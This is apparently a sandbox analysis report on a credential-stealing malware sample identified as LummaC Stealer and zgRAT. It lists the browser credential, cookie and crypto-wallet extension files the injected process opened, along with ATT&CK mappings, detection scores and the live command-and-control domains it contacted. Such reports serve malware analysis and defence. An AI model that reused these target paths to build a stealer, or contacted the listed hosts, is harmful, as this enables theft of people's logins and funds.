Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Source: Yara match	File source: 00000002.00000002.1774845977.0000000000B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7208, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\ZQIXMVQGAH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\ZQIXMVQGAH	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7208, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected zgRAT

Source: Yara match	File source: TT4ybwWc1T.exe, type: SAMPLE
Source: Yara match	File source: 0.0.TT4ybwWc1T.exe.460000.0.unpack, type: UNPACKEDPE

Source: C:\Users\user\Desktop\TT4ybwWc1T.exe

Code function: 0_2_6C8FA0C0 CorBindToRuntimeEx,GetModuleHandleW,GetModuleHandleW,__cftoe,GetModuleHandleW,GetProcAddress,

0_2_6C8FA0C0

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Native API	1 DLL Side-Loading	211 Process Injection	1 Masquerading	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	21 Data from Local System	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	121 Virtualization/Sandbox Evasion	Security Account Manager	121 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	211 Process Injection	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	112 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	3 Obfuscated Files or Information	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	11 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	23 System Information Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
TT4ybwWc1T.exe	53%	ReversingLabs	Win32.Spyware.Lummastealer
TT4ybwWc1T.exe	65%	Virustotal		Browse
TT4ybwWc1T.exe	100%	Avira	TR/Kryptik.qzwec
TT4ybwWc1T.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll	0%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
voloknus.pw	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://voloknus.pw/	100%	Avira URL Cloud	malware
http://x1.i.lencr.org/0	0%	URL Reputation	safe
http://voloknus.pw/2nekt9Tpzu4t9UGz	100%	Avira URL Cloud	malware
voloknus.pw	100%	Avira URL Cloud	malware
http://voloknus.pw/P-	100%	Avira URL Cloud	malware
http://voloknus.pw/	0%	Virustotal		Browse
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
http://crt.rootca1.amazontrust.com/rootca1.cer0?	0%	URL Reputation	safe
http://voloknus.pw/E(	100%	Avira URL Cloud	malware
mouseoiet.fun	20%	Virustotal		Browse
voloknus.pw	0%	Virustotal		Browse
http://voloknus.pw/api6wuOtdB	100%	Avira URL Cloud	malware
http://voloknus.pw:80/api-	100%	Avira URL Cloud	malware
http://voloknus.pw/S	100%	Avira URL Cloud	malware
http://voloknus.pw/apiMpU5lT	100%	Avira URL Cloud	malware
mouseoiet.fun	100%	Avira URL Cloud	malware
bluepablo.fun	100%	Avira URL Cloud	malware
http://voloknus.pw/apiSuH/iWh	100%	Avira URL Cloud	malware
zamesblack.fun	100%	Avira URL Cloud	malware
http://voloknus.pw/api-	100%	Avira URL Cloud	malware
zamesblack.fun	16%	Virustotal		Browse
http://voloknus.pw/apif3h5zg	100%	Avira URL Cloud	malware
http://voloknus.pw:80/api	100%	Avira URL Cloud	malware
http://voloknus.pw/api3	100%	Avira URL Cloud	malware
http://voloknus.pw/api4	100%	Avira URL Cloud	malware
bluepablo.fun	19%	Virustotal		Browse
http://voloknus.pw:80/api	8%	Virustotal		Browse
http://voloknus.pw/api	100%	Avira URL Cloud	malware
plengreg.fun	100%	Avira URL Cloud	malware
http://voloknus.pw/apigwlhGzn	100%	Avira URL Cloud	malware
http://ocsp.rootca1.amazontrust.com0:	0%	Avira URL Cloud	safe
howlcars.fun	100%	Avira URL Cloud	malware
http://voloknus.pw/)	100%	Avira URL Cloud	malware
http://voloknus.pw/api	8%	Virustotal		Browse
duhodown.fun	100%	Avira URL Cloud	malware
http://voloknus.pw/apiX	100%	Avira URL Cloud	malware
http://voloknus.pw/apiV	100%	Avira URL Cloud	malware
http://voloknus.pw/apiS	100%	Avira URL Cloud	malware
duhodown.fun	20%	Virustotal		Browse
plengreg.fun	16%	Virustotal		Browse
http://voloknus.pw/(	100%	Avira URL Cloud	malware
kowersize.fun	100%	Avira URL Cloud	malware
comperssw.fun	100%	Avira URL Cloud	malware
howlcars.fun	16%	Virustotal		Browse
http://voloknus.pw/apib	100%	Avira URL Cloud	malware
kowersize.fun	20%	Virustotal		Browse
http://voloknus.pw/apie	100%	Avira URL Cloud	malware
http://voloknus.pw/apiS	0%	Virustotal		Browse
comperssw.fun	20%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
voloknus.pw	104.21.84.113	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
voloknus.pw	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
mouseoiet.fun	true	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
bluepablo.fun	true	19%, Virustotal, Browse Avira URL Cloud: malware	unknown
zamesblack.fun	true	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://voloknus.pw/api	true	8%, Virustotal, Browse Avira URL Cloud: malware	unknown
plengreg.fun	true	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
howlcars.fun	true	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
duhodown.fun	true	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
kowersize.fun	true	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
comperssw.fun	true	20%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://voloknus.pw/	RegAsm.exe, 00000002.00000002.1774845977.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://voloknus.pw/2nekt9Tpzu4t9UGz	RegAsm.exe, 00000002.00000002.1779531861.00000000035D3000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://duckduckgo.com/chrome_newtab	RegAsm.exe, 00000002.00000002.1779531861.00000000035C8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://voloknus.pw/P-	RegAsm.exe, 00000002.00000002.1779531861.00000000035D3000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	RegAsm.exe, 00000002.00000002.1779531861.00000000035C8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	RegAsm.exe, 00000002.00000002.1779531861.00000000035C8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	RegAsm.exe, 00000002.00000002.1781462307.00000000039F5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	RegAsm.exe, 00000002.00000002.1781462307.00000000039F5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	RegAsm.exe, 00000002.00000002.1779531861.00000000035C8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://voloknus.pw/E(	RegAsm.exe, 00000002.00000002.1774845977.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://voloknus.pw/api6wuOtdB	RegAsm.exe, 00000002.00000002.1779531861.00000000035D3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://voloknus.pw:80/api-	RegAsm.exe, 00000002.00000002.1781462307.0000000003981000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://voloknus.pw/S	RegAsm.exe, 00000002.00000002.1774845977.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://voloknus.pw/apiMpU5lT	RegAsm.exe, 00000002.00000002.1779531861.00000000035D3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://voloknus.pw/apiSuH/iWh	RegAsm.exe, 00000002.00000002.1779531861.00000000035D3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	RegAsm.exe, 00000002.00000002.1784602904.0000000003BD4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	TT4ybwWc1T.exe, 00000000.00000002.1363330210.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	false		high
http://voloknus.pw/api-	RegAsm.exe, 00000002.00000002.1779531861.00000000035D3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1774845977.0000000000B77000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://voloknus.pw/apif3h5zg	RegAsm.exe, 00000002.00000002.1779531861.00000000035D3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://voloknus.pw:80/api	RegAsm.exe, 00000002.00000002.1781462307.0000000003981000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1774845977.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp	false	8%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://voloknus.pw/api3	RegAsm.exe, 00000002.00000002.1779531861.00000000035D3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://voloknus.pw/api4	RegAsm.exe, 00000002.00000002.1779531861.00000000035D3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	RegAsm.exe, 00000002.00000002.1779531861.00000000035C8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://voloknus.pw/apigwlhGzn	RegAsm.exe, 00000002.00000002.1779531861.00000000035D3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RegAsm.exe, 00000002.00000002.1779531861.00000000035C8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	RegAsm.exe, 00000002.00000002.1781462307.00000000039F5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	RegAsm.exe, 00000002.00000002.1781462307.00000000039F5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	RegAsm.exe, 00000002.00000002.1779531861.00000000035C8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://voloknus.pw/)	RegAsm.exe, 00000002.00000002.1774845977.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
